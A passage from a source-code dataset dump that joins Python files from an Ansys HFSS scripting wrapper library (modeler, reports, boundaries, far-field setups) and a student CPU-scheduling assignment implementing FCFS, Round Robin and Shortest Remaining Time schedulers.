if isinstance(objects, list):
obj_str = ",".join(objects)
o3DMod.Delete(
[
"NAME:Selections",
"Selections:=", obj_str
]
)
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,733 | judealnas/PyHFSS | refs/heads/master | /hfss3DModeler/hfssFillet.py | from hfss3DModeler import _getModeler
def _filletParamListElmt(radius, setback, edges, vertices):
return [
"NAME:FilletParameters",
"Edges:=", edges,
"Vertices:=", vertices,
"Radius:=", "{}mm".format(radius),
"Setback:=", "{}mm".format(setback)
]
def _fillet(oEditor, selections, radius, setback=0, edges=[], vertices=[]):
"""
:param oDesign: target HFSS design,
:param selections: list of IDs (e.g. object names)
:param radius: fillet radius
:param setback: setback distance; applicable in 3D only
:param edges: A 2D list of edge ID sets; each element of <ids> is another
list containing edge IDs belonging to corresponding entity in <selections>;
For 2D fillets, <edges> must be empty list and <vertices> populated
For 3D fillets, <vertices> must be empty list and <edges> populated
:param vertices:A 2D list of vertex ID sets; each element of <ids> is another
list containing vertex IDs belonging to corresponding entity in <selections>;
For 2D fillets, <edges> must be empty list and <vertices> populated
For 3D fillets, <vertices> must be empty list and <edges> populated
:return: None
"""
one_elmt_flag = not isinstance(selections, list)
# if single object selection, wrap in list
if one_elmt_flag:
selections = [selections]
# wrap vertex/edge lists
if len(vertices) != 0:
vertices = [vertices]
if len(edges) != 0:
edges = [edges]
fillet_selection = [
"NAME:Selections",
"Selections:=", ",".join(selections),
"NewPartsModelFlag:=", "Model"
]
fillet_params = []
if len(edges) == 0:
fillet_params = [
_filletParamListElmt(radius=radius, setback=setback,edges=[],vertices=vtx_set)
for vtx_set in vertices
]
elif len(vertices) == 0:
fillet_params = [
_filletParamListElmt(radius=radius, setback=setback, edges=edge_set, vertices=[])
for edge_set in edges
]
fillet_params.insert(0, "NAME:Parameters")
oEditor.Fillet(
fillet_selection,
fillet_params
)
def hfss2DFillet(oEditor, selections, vtx_ids, radius):
"""
:param oEditor: oDesign.SetActiveEditor("3D Modeler")
:param selections: List of face ids
:param vtx_ids: 2D list where nested lists are vertex
belonging to corresponding face entity <selections>
:param radius: Fillet radius in mm
:return: None
"""
_fillet(oEditor, selections=selections, vertices=vtx_ids, radius=radius)
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,734 | judealnas/PyHFSS | refs/heads/master | /hfssReporter.py | def _getReporter(oDesign):
return oDesign.GetModule("ReportSetup")
def AddCartesianLimitLine(oDesign, report_name, x_vals, x_unit_str, y_vals, y_units_str, y_axis_name):
"""
Adds a limit line to a report on the X axis.
:param oDesign: Target HFSS Design
:param report_name: Target Report name
:param x_vals: List of x values (numeric)
:param x_unit_str: X axis units (string)
:param y_vals: List of y values (numeric)
:param y_units_str: Y axis units (string)
:param y_axis_name: Name of associated Y axis (string)
:return: None
"""
oReporter = _getReporter(oDesign)
oReporter.AddCartesianLimitLine(report_name,
[
"NAME:CartesianLimitLine",
x_vals.insert(0, "NAME:XValues"),
"XUnits:=", x_unit_str,
y_vals.insert(0, "NAME:YValues"),
"YUnis:=", y_units_str,
"YAxis:=", y_axis_name
])
def GetAllReportNames(oDesign):
"""
:param oDesign: Target HFSS design
:return: List of all report names in design
"""
oReporter = _getReporter(oDesign)
return oReporter.GetAllReportNames()
def CreateReport(oDesign, report_name, report_type, dispay_type, soln_name, cntxt_arr, family_arr,
x_component, y_component, z_component=None):
"""
Creates a new report with a single trace and adds it to the Results branch in the project tree.
:param oDesign: Target HFSS design
:param report_name: New Report name
:param report_type: Type of new report (e.g. "Modal Solution Data" or "Far Fields")
:param dispay_type: Display type (e.g. "Rectangular Plot" or "Data Table")
:param soln_name: Solution name
:param cntxt_arr: Context array (specifies geometry and/or domain)
:param family_arr: Family array (selects variations)
:param x_component: X domain quantity, e.g. "Freq" to plot against frequency
:param y_component: List of Y domain quantities
:param z_component: List of Z domain quantities (optional)
:return: None
"""
oReporter = _getReporter(oDesign)
report_data = [
"X Component:=", x_component,
"Y Component:=", y_component
]
if z_component != None:
report_data.extend(["Z Component:=", z_component])
oReporter.CreateReport(report_name, report_type, dispay_type, soln_name, cntxt_arr, family_arr,
report_data)
def ExportToFile(oDesign, report_name, file_path):
"""
From a data table or plot, generates text format, comma delimited, tab delimited, .dat, or .rdat type
output files.
:param oDesign: Target HFSS Design
:param report_name: Target report
:param file_path: Absolute path and filename. Supports extensions .txt, .csv, .tab, .dat, or .rdat
:return: None
"""
oReporter = _getReporter(oDesign)
oReporter.ExportToFile(report_name, file_path)
def UpdateReport(oDesign, report_name):
"""
Updates the specified reports in the Results branch in the project tree.
:param oDesign: Target HFSS design
:param report_name: Report to update
:return: None
"""
oReporter = _getReporter(oDesign)
oReporter.UpdateReport(report_name)
def UpdateAllReports(oDesign):
"""
Updates all reports in the Results branch in the project tree.
:param oDesign: Target HFSS design
:return: None
"""
oReporter = _getReporter(oDesign)
oReporter.UpdateAllReports() | {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,735 | judealnas/PyHFSS | refs/heads/master | /hfss3DModeler/hfssGetVertexIDs.py | from hfss3DModeler import _getModeler
def GetVertexIDsFromObject(o3DMod, obj_id):
"""
:param o3DMod: oDesign.SetActiveEditor("3D Modeler")
:param obj_id: target object ID (i.e. names)
:return: 2D list where nested list correspond with object id in <obj_ids>
"""
return _getVtxIDs(o3DMod, obj_id, "object")
def GetVertexIDsFromFace(o3DMod, face_id):
"""
:param o3DMod: oDesign.SetActiveEditor("3D Modeler")
:param face_id: target face ID (int or int string)
:return: 2D list of vertices where nested list correspond with ids in <face_ids>
"""
return _getVtxIDs(o3DMod, face_id, "object")
def GetVertexIDsFromEdge(o3DMod, edge_id):
"""
:param o3DMod: oDesign.SetActiveEditor("3D Modeler")
:param edge_id: target edge_id (int or int string)
:return: 2D list of vertices where nested list correspond with ids in <edge_ids>
"""
return _getVtxIDs(o3DMod, edge_id, "object")
def _getVtxIDs(oEditor, id, mode):
vtx_ids = []
if mode.lower() == "face":
vtx_ids = oEditor.GetVertexIDsFromFace(id)
elif mode.lower() == "edge":
vtx_ids = oEditor.GetVertexIDsFromedge(id)
elif mode.lower() == "object":
vtx_ids = oEditor.GetVertexIDsFromObject(id)
vtx_ids = list(map(int, vtx_ids)) # convert string num to int
return vtx_ids
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,736 | judealnas/PyHFSS | refs/heads/master | /hfssOutputVars.py | def _getOutVarModule(oDesign):
return oDesign.GetModule("OutputVariable")
def GetOutputVariableValue(oVars, name, variation, soln, report_type, context=[]):
"""
:param oVars: oDesign.GetModule("OutputVariable")
:param name: output variable name
:param variation: e.g. "Freq='1GHz'", "Theta='25deg'", "Phi='90deg'"
:param soln: Name of solution e.g. "Setup1 : Sweep"
:param report_type: Data type e.g. "Modal Solution Data"
:param context: Empty list or list of ["Context:=", <Far field setup or geometry>]
:return: numeric value of specified output variable
"""
val = oVars.GetOutputVariableValue(name, variation, soln, report_type, context)
return val
def CreateOutputVar(oVars, name, expression, soln_name, report_type, cntxt=[]):
"""
:param oVars: oDesign.GetModule("OutputVariable")
:param name:
:param expression:
:param soln_name:
:param report_type:
:param cntxt:
:return:
"""
oVars.CreateOutputVariable(name, expression, soln_name, report_type, cntxt)
def DeleteOutputVar(oVars, name):
"""
:param oVars: oDesign.GetModule("OutputVariable")
:param name:
:return:
"""
oVars.DeleteOutputVariable(name)
def DoesOutVarExist(oVars, name):
"""
:param oVars:
:param name:
:return:
"""
val = oVars.DoesOutputVariableExist(name)
return val
if __name__ == "__main__":
import sys
sys.path.append("C:\\Program Files\\AnsysEM\\AnsysEM20.2\\Win64")
sys.path.append("C:\\Program Files\\AnsysEM\\AnsysEM20.2\\Win64\\PythonFiles\\DesktopPlugin")
import ScriptEnv
ScriptEnv.Initialize("Ansoft.ElectronicsDesktop")
oProject = oDesktop.GetActiveProject()
oDesign = oProject.GetActiveDesign()
val = GetOutputVariableValue(oDesign, "bandwidth", "Domain='Sweep'", "Setup1 : Sweep", "Modal Solution Data", [])
oDesktop.AddMessage(oProject.GetName(), oDesign.GetName(), 0, str(val), "")
ScriptEnv.Shutdown() | {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,737 | judealnas/PyHFSS | refs/heads/master | /hfssDesign.py | def ValidateDesign(oDesign, filepath, b_clr_filepath):
return oDesign.ValidateDesign(filepath, b_clr_filepath)
def Analyze(oDesign, setup_name):
return oDesign.Analyze(setup_name) | {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,738 | judealnas/PyHFSS | refs/heads/master | /hfss3DModeler/__init__.py | def _getModeler(oDesign):
return oDesign.SetActiveEditor("3D Modeler")
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,739 | judealnas/PyHFSS | refs/heads/master | /hfssAnalysisSetup.py | def _getAnalysisModule(oDesign):
return oDesign.GetModule("AnalysisSetup")
def GetSetups(oAnalysis):
setups = oAnalysis.GetSetups()
return setups
def GetSetupCount(oAnalysis):
cnt = oAnalysis.GetSetupCount()
return cnt
def GetSweeps(oAnalysis):
sweeps = oAnalysis.GetSweeps()
return sweeps
def GetSweepCount(oAnalysis):
cnt = oAnalysis.GetSweepCount()
return cnt | {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,740 | judealnas/PyHFSS | refs/heads/master | /hfssRadiation.py | def _getRadFieldModule(oDesign):
return oDesign.GetModule("RadField")
def InsertFarFieldSphereSetup(oRad, name="Infinite Sphere1",
theta_dict={"start": 0, "stop": 180, "step": 2},
phi_dict={"start": -180, "stop": 180, "step": 2},
coord_sys="Global", face_list_name=""):
"""
:param oRad: oDesign.GetModule("RadField")
:param name: Name of the new setup
:param theta_dict: Theta start, stop, and step angles in degrees in dictionary with keys "start", "stop", "step"
:param phi_dict: Phi start, stop, and step angles in degrees in dictionary with keys "start", "stop", "step"
:param coord_sys: Name of reference coordinate system
:param face_list_name: name of face list (configured in HFSS) to use for rad boundary
:return: Name of new setup
"""
bool_local_cs = not(coord_sys == "Global")
bool_custom_rad = face_list_name != ""
# If using default name, check for pre-existing setups
if name == "Infinite Sphere1":
existing_setups = oRad.GetSetupNames("Infinite Sphere")
i = 2
while name in existing_setups:
name = "Infinite Sphere{}".format(i)
i = i + 1
# Create new far field infinite sphere setup
oRad.InsertFarFieldSphereSetup([
"NAME:" + name,
"UseCustomRadiationSurface:=", bool_custom_rad,
"CustomRadiationSurface:=", face_list_name,
"ThetaStart:=", "{}deg".format(theta_dict["start"]),
"ThetaStop:=", "{}deg".format(theta_dict["stop"]),
"ThetaStep:=", "{}deg".format(theta_dict["step"]),
"PhiStart:=", "{}deg".format(phi_dict["start"]),
"PhiStop:=", "{}deg".format(phi_dict["stop"]),
"PhiStep:=", "{}deg".format(phi_dict["step"]),
"UseLocalCS:=", bool_local_cs,
"CoordSystem:=", coord_sys
])
return name
def DeleteFarFieldSetup(oRad, setups):
"""
:param oRad: oDesign.GetModule("RadField")
:param setups: List of far field setup names to delete
:return:
"""
oRad.DeleteFarFieldSetup(setups)
oRad.release()
def DeleteNearFieldSetup(oRad, setups):
"""
:param oRad: oDesign.GetModule("RadField")
:param setups: List of near field setup names to delete
:return:
"""
oRad.DeleteNearFieldSetup(setups)
oRad.release()
def DeleteFieldSetup(oRad, setups):
"""
:param oRad: oDesign.GetModule("RadField")
:param setups: List of setup names to delete (near and far field)
:return:
"""
ff_setups = oRad.GetSetupNames("Infinite Sphere") # far field setups
nf_setups = [] # near field setups
for geometry in ["Sphere", "Box", "Line", "Rectangle"]:
nf_setups.extend(oRad.GetSetupNames(geometry))
# Convert to set to remove duplicates and
# use set method intersection() to delete appropriate setups within <setups>
oRad.DeleteFarFieldSetup(list(set(setups).intersection(set(ff_setups))))
oRad.DeleteNearFieldSetup(list(set(setups).intersection(set(nf_setups))))
oRad.release()
def GetSetupNames(oRad, geometry_str):
"""
:param oRad: oDesign.GetModule("RadField")
:param geometry_str: One of "Infinite Sphere", "Sphere", "Line", "Rectangle", or "Box"
:return: List of setups with geometries matching <geometry_str>
"""
names = oRad.GetSetupNames(geometry_str)
oRad.release()
return names
if __name__ == "__main__":
import ScriptEnv
ScriptEnv.Initialize("Ansoft.ElectronicsDesktop")
oProject = oDesktop.GetActiveProject()
oDesign = oProject.GetActiveDesign()
InsertFarFieldSphereSetup(oDesign, name="TestSetup")
DeleteFieldSetup(oDesign, ["TestSetup", "Box1"])
ScriptEnv.Shutdown
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,741 | judealnas/PyHFSS | refs/heads/master | /hfssBoundaries.py | def _wrapToList(x):
if not isinstance(x, list):
x = [x]
return x
def _getBoundsModule(oDesign):
return oDesign.GetModule("BoundarySetup")
def AssignCopperBound(oBounds, bound_name="", obj_names=[], face_ids=[]):
"""
:param oBounds: oDesign.GetModule("BoundarySetup")
:param bound_name: Name of new boundary setup
:param obj_names: List of objects to assign to boundary
:param face_ids: List of faces to assign boundaries
:return: Name of newly-created boundary setup
Creates a boundary called <bound_name> with the same properties of copper and 0 roughness.
An error is thrown in HFSS if <bound_name> is the name of a pre-existing boundary.
TO-DO: Generalize function to assign finite conductivity boundary. Will likely need a set of functions.
One for assigning boundaries imitating a material (e.g. copper) and one for custom conductivity. Will need
functions to generate roughness and thickness parameters depending on options (e.g. Grouse vs Hary,
infinite vs DC thickness)
"""
# if no boundary name provided, generate an unused one
if bound_name == "":
existing_bounds = oBounds.GetBoundaries()
i = 1
bound_name = "FiniteCond{}".format(i)
while bound_name in existing_bounds:
i = i + 1
bound_name = "FiniteCond{}".format(i)
# ensure target objects and faces are in lists
obj_names = _wrapToList(obj_names)
face_ids = _wrapToList(face_ids)
oBounds.AssignFiniteCond(
[
"NAME:" + bound_name,
"Objects:=", obj_names,
"Faces:=", face_ids,
"UseMaterial:=" , True,
"Material:=" , "copper",
"UseThickness:=" , False,
"Roughness:=" , "0um",
"InfGroundPlane:=" , False,
"IsTwoSided:=" , False,
"IsInternal:=" , True
])
def DeleteBoundaries(oBounds, bounds):
"""
:param oBounds: oDesign.GetModule("BoundarySetup")
:param bounds: list of strings naming boundaries to delete
"""
oBounds.DeleteBoundareis(bounds)
def GetBoundaries(oBounds):
"""
:param oBounds: oDesign.GetModule("BoundarySetup")
:return list of strings naming boundaries in target design
"""
return oBounds.GetBoundaries()
def GetNumBoundaries(oBounds):
"""
:param oBounds: oDesign.GetModule("BoundarySetup")
:return Number of boundaries in target design
"""
return oBounds.GetNumBoundaries()
def ReassignBoundary(oBounds, bound_name, obj_names=[], face_ids=[]):
"""
:param oBounds: oDesign.GetModule("BoundarySetup")
:param bound_name: name of boundary to reassign,
:param obj_names: list of names of objects to assign boundary
:param face_ids: list of face ID nums to assign boundary
Note that leaving both <obj_names> and <face_ids> empty will remove
all assignments of the boundary
"""
oBounds.ReassignBoundary(
[
"NAME:" + bound_name,
"Objects:=", obj_names,
"Faces:=", face_ids
]
)
def AddAssignmentToBoundary(oBounds, bound_name, obj_names=[], face_ids=[]):
"""
:param oBounds: oDesign.GetModule("BoundarySetup")
:param bound_name: Target boundary setup
:param obj_names: List of objects to add to boundary
:param face_ids: List of face IDs to add to boundary
:return:
"""
obj_names = _wrapToList(obj_names)
face_ids = _wrapToList(face_ids)
oBounds.AddAssignmentToBoundary(
[
"NAME:" + bound_name,
"Objects:=", obj_names,
"Faces:=", face_ids
]
)
| {"/hfss3DModeler/hfssModeler.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssFillet.py": ["/hfss3DModeler/__init__.py"], "/hfss3DModeler/hfssGetVertexIDs.py": ["/hfss3DModeler/__init__.py"]} |
49,803 | jloemba/python-nl | refs/heads/master | /stop_word.py | from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from nltk.tag import pos_tag
import string
def extract_stop_in_sentence(sentence):
if " - " in sentence :
sentence = sentence[:sentence.index(" - ")] # Exclure le nom de l'article ( " - Le Monde " , "- LCI")
stop_words = set(stopwords.words('french')) #Langue du dictionnaire
word_tokens = word_tokenize(sentence) #Découpage de la phrase
tagged_sent = pos_tag(word_tokens) # Avoir les POS TAGGER de chaque mot phrase
#print(tagged_sent)
word_tokens = [word for word,pos in tagged_sent if pos == 'NNP']
filtered_sentence = []
for w in word_tokens: # Pour chaque mot de la liste
if w not in stop_words: # Si le mot indexé n'est pas dans le dictionnaire des noms communs
filtered_sentence.append(w) # On l'ajoute dans notre liste finale
return filtered_sentence # Afin d'avoir qu'une liste sans noms communs
def strip_punctuation(sentence):
#table = str.maketrans({key: None for key in string.punctuation})
for i in sentence:
if i in string.punctuation:
print("Punctuation: " + i)
for c in string.punctuation:
sentence= sentence.replace(c,"")
#return sentence.translate(table)
return sentence
def remove_punctuation(value):
result = ""
for c in value:
# If char is not punctuation, add it to the result.
if c not in string.punctuation:
result += c
return result
#sentence = "Red Dead Redemption 2 arrivera sur PC le 5 novembre, ainsi que sur Google Stadia - Les Numériques" #La phrase concernée
#print(extract_stop_in_sentence(sentence))
| {"/app.py": ["/stop_word.py"]} |
49,804 | jloemba/python-nl | refs/heads/master | /app.py | import pprint
import requests
import pandas as pd
from pandas.io.json import json_normalize
import nltk
from nltk.corpus import stopwords
from nltk.tokenize import word_tokenize
from stop_word import extract_stop_in_sentence , remove_punctuation
#nltk.download() Pour installer les packages
dictionary = requests.get('https://newsapi.org/v2/top-headlines?country=fr&category=technology&apiKey=853e02b0ec344bd182ea180e7fb93bf9').json()
stop_words = set(stopwords.words('french'))
data = dictionary['articles']
#pprint.pprint(dictionary['articles']) #Afficher en console tout en gardant la structure de données JSON
json_normalize(data)
#print(data[)
df = pd.DataFrame(data)
#df["content"].astype(str)
#print(type(df['content'][0]))
#words = df.title.str.split(expand=True).stack()
#words = words[words.isin(selected_words)]
#print(words.value_counts())
list_word = []
for item in df.title:
data = nltk.word_tokenize(str(item))
if data[0] != 'None':
#print(' ')
#print('Title :')
#print( data[-1] )
data = " ".join(str(d) for d in data)
data = remove_punctuation(data)
print(data)
list_word = list_word + extract_stop_in_sentence(data)
#word_tokens = list_word
list_word_df = pd.DataFrame({'title':list_word})
print(list_word_df)
count_word_df = list_word_df['title'].value_counts().to_frame()
for w in count_word_df:
print(" ")
#print(nltk.word_tokenize(df['content'][0]))
| {"/app.py": ["/stop_word.py"]} |
49,807 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /FCFS.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '20/10/2016'
__studentID__ = 26356104
__LastModified__ = '24/10/2016'
'''
First Come First Serve Scheduler (FCFS)
Uses a queue to implement this scheduling algorithm
OUTPUT:
- Information about each finished process in sequence of completion
- Average Turnaround Time
- Average Waiting Time
- Throughput
'''
from Process import Process
import queue
class FCFS:
def __init__(self):
# Initial constructor of the Scheduler.
self.lines = open('processes.txt', 'r').readlines()
self.ready = queue.Queue(len(self.lines))
self.averageT = 0
self.count = 0
self.averageW = 0
self.throughput = 0
def run(self):
# Loading all the data into relevant data structures for later operation and use.
for line in self.lines:
words = line.split(' ')
# print(words)
p = Process(words[0], int(words[1]), int(words[2]))
self.ready.append(p)
self.process()
'''
Processing each process in the ready queue following the SRT algorithm.
'''
def process(self):
'''
The following lines implement the FCFS algorithm of executing processes on their relative entry time in
the ready queue.
This queue used is populated by Processes listed in the processes.txt file.
'''
while not self.ready.is_empty():
p = self.ready.serve()
self.printProcess(p)
# print(self.count)
self.stats()
'''
Displaying the statistics of this scheduling algorithm upon its completion.
'''
def stats(self):
self.averageT /= len(self.lines)
self.averageW /= len(self.lines)
print("Average waiting time: " + str(self.averageW))
print("Average Turnaround time: " + str(self.averageT))
self.throughput = len(self.lines) / self.averageT
print("Throughput: " + str(self.throughput))
'''
Displaying the data of the process upon its completion.
'''
def printProcess(self, p):
p.waiting = self.count - p.arrival
p.start = self.count
self.count += p.duration
p.turn = self.count - p.start
print("Process ID: " + str(p.name))
print("Waiting time: " + str(p.waiting))
print("Turnaround time: " + str(p.turn) + "\n\n")
self.averageT += p.turn
self.averageW += p.waiting
def main():
print("FCFS Scheduler")
FCFS().run()
if __name__ == "__main__":
main()
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,808 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /RoundRobin.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '20/10/2016'
__studentID__ = 26356104
__LastModified__ = '24/10/2016'
from Process import Process
import queue
import os
'''
Round Robin Scheduler (RR)
Uses a queue to implement this scheduling algorithm
OUTPUT:
- Information about each finished process in sequence of completion
- Average Turnaround Time
- Average Waiting Time
- Throughput
'''
class RoundRobin:
# Initial Constructor of the Scheduler.
def __init__(self):
self.lines = open('processes.txt', 'r').readlines()
self.ready = queue.Queue(len(self.lines))
self.i = 0
self.load_var = 0
self.program_counter = 0
self.time_quantum = 2
self.all = []
self.load_time = []
self.averageT = 0
self.averageW = 0
self.throughput = 0
self.passed = 0
def run(self):
# Loading all the data into relevant data structures for later operation and use.
for line in self.lines:
words = line.split(' ')
p = Process(words[0], int(words[1]), int(words[2]))
self.load_time.append(int(words[1]))
self.all.append(p)
while self.i < len(self.lines):
p = self.all[self.i]
if p.start == self.program_counter:
self.ready.append(p)
self.process()
self.i += 1
else:
self.program_counter += 1
self.i += 1
'''
Processing each process in the ready queue following the SRT algorithm.
'''
def process(self):
'''
The following lines implement the Round Robin algorithm of executing processes based on a time quantum value
set initially in the constructor.
This queue used is populated by Processes listed in the processes.txt file.
'''
p = self.ready.serve()
print(p.name)
if p.duration <= 0:
p.duration = 0
if not self.ready.is_empty() and p.duration > 0:
p.duration -= self.time_quantum
if p.duration <= 0:
# Displaying data upon its completion
self.program_counter += self.time_quantum + p.duration
# Process completed
p.duration = 0
p.turn = self.program_counter - p.start
p.waiting += self.program_counter - p.start
print("Process ID: " + str(p.name))
print("Turnaround time: " + str(p.turn) + '\n')
self.averageT += p.turn
self.averageW += p.waiting
self.process()
else:
p.waiting += self.program_counter - p.start
self.ready.append(p)
p.start = self.program_counter
self.program_counter += self.time_quantum
self.process()
elif self.ready.is_empty() and p.duration > 0:
print("PC: " + str(self.program_counter))
if self.load_var <= (len(self.load_time) - 2) and self.program_counter <= self.load_time[self.load_var + 1]:
print(p.duration)
p.duration -= self.time_quantum
self.program_counter += self.load_time[self.load_var] + self.time_quantum
self.ready.append(p)
self.process()
else:
self.load_var += 1
# print("Load var " + str(self.load_var))
if self.load_var < len(self.load_time):
p1 = self.all[self.load_var]
self.ready.append(p1)
self.ready.append(p)
self.process()
else:
'''
Displaying the data of the process upon its completion.
'''
self.program_counter += p.duration
print("PC: " + str(self.program_counter))
p.duration = 0
p.turn = self.program_counter - p.arrival
p.waiting = self.program_counter - p.start
print("Process ID: " + str(p.name))
print("Turnaround time: " + str(p.turn) + '\n')
self.averageT += p.turn
self.averageW += p.waiting
self.stats()
os._exit(0)
if p.duration <= 0:
p.duration = 0
p.turn = (p.arrival + self.program_counter) - p.start
p.waiting += self.program_counter - p.start
print("Process ID: " + str(p.name))
print("Turnaround time: " + str(p.turn) + '\n')
self.averageT += p.turn
self.averageW += p.waiting
'''
Displaying the statistics of this scheduling algorithm upon its completion.
'''
def stats(self):
print(self.program_counter)
self.averageT /= len(self.lines)
self.averageW /= len(self.lines)
print("Average waiting time: " + str(self.averageW))
print("Average Turnaround time: " + str(self.averageT))
self.throughput = len(self.lines) / self.averageT
print("Throughput: " + str(self.throughput))
def main():
print("Round Robin Scheduler")
RoundRobin().run()
if __name__ == "__main__":
main()
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,809 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /comparator.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '22/8/2016'
__studentID__ = 26356104
__LastModified__ = '31/8/2016'
from FCFS import FCFS
from RoundRobin import RoundRobin
from SRT import SRT
def main():
fcfs = FCFS()
rr = RoundRobin()
srt = SRT()
print("FCFS Scheduler")
fcfs.run()
print("Round Robin Scheduler")
rr.run()
print("Shortest Remaining Time Scheduler")
srt.run()
if __name__ == "__main__":
main()
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,810 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /Process.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '20/8/2016'
__studentID__ = 26356104
__LastModified__ = '24/10/2016'
class Process:
def __init__(self, name="", start=0, duration=0):
self.name = name
self.start = start
self.duration = duration
self.waiting = 0
self.turn = 0
self.arrival = start
assert isinstance(self.name, str)
assert isinstance(self.turn, int)
assert isinstance(self.start, int)
assert isinstance(self.duration, int)
assert isinstance(self.waiting, int)
assert isinstance(self.arrival, int)
| {"/FCFS.py": ["/Process.py", "/queue.py"], "/RoundRobin.py": ["/Process.py", "/queue.py"], "/comparator.py": ["/FCFS.py", "/RoundRobin.py", "/SRT.py"], "/SRT.py": ["/Process.py"]} |
49,811 | PaarthB/CPU-Scheduling-Algorithms | refs/heads/master | /SRT.py | __author__ = "Paarth Bhasin"
__title__ = "Assignment-3 FIT2070: Operating Systems"
__tutor__ = "Hasanul Ferdaus"
__StartDate__ = '20/10/2016'
__studentID__ = 26356104
__LastModified__ = '24/10/2016'
# Using priority queue to handle processes based on time remaining.
from PriorityQueue import PriorityQueue
from Process import Process
'''
Shortest Remaining Time Scheduler (SRT)
Uses a priority queue to implement this scheduling algorithm
OUTPUT:
- Information about each finished process in sequence of completion
- Average Turnaround Time
- Average Waiting Time
- Throughput
'''
class SRT:
def __init__(self):
# Initial Constructor of the Scheduler.
self.lines = open('processes.txt', 'r').readlines()
self.ready = PriorityQueue()
self.all = []
self.i = 0
self.finished = 0
self.program_counter = 0
self.load_time = []
self.load_var = 0
self.averageT = 0
self.averageW = 0
self.throughput = 0
def run(self):
# Loading all the data into relevant data structures for later operation and use.
for line in self.lines:
words = line.split(' ')
p = Process(words[0], int(words[1]), int(words[2]))
self.load_time.append(int(words[1]))
self.all.append(p)
while self.i < len(self.lines):
p = self.all[self.i]
if p.start == self.program_counter:
self.ready.add(p)
self.process()
self.i += 1
else:
self.i += 1
'''
Processing each process in the ready queue following the SRT algorithm.
'''
def process(self):
p = self.ready.serve()
print(p.name)
'''
The following lines implement the SRT algorithm of choosing the process with the minimum time remaining from the
the ready queue. This queue is a priority queue and always returns the minimum element in the list based on
the remaining time.
This list is populated by Processes listed in the processes.txt file.
The algorithm also handles preemption when a new process with shorter remaining time than the currently
executing process is found.
'''
if self.ready.count <= 0 < p.duration:
print("PC: " + str(self.program_counter))
if self.load_var <= (len(self.load_time) - 2) and self.program_counter < self.load_time[self.load_var + 1]:
next_load = self.load_time[self.load_var + 1]
p.duration -= next_load - self.program_counter
self.program_counter += next_load
p.start = self.program_counter
self.load_var += 1
if self.all[self.load_var].duration < p.duration:
print("Preempt")
p1 = self.all[self.load_var]
self.ready.add(p)
self.ready.add(p1)
self.process()
else:
p1 = self.all[self.load_var]
self.ready.add(p1)
self.program_counter += p.duration
self.printProcess(p)
if self.finished == len(self.lines):
self.stats()
exit(0)
else:
self.process()
elif self.load_var <= (len(self.load_time) - 2) and self.program_counter > self.load_time[
self.load_var + 1]:
self.program_counter += p.duration
self.printProcess(p)
print("PC: " + str(self.program_counter))
if self.finished == len(self.lines):
self.stats()
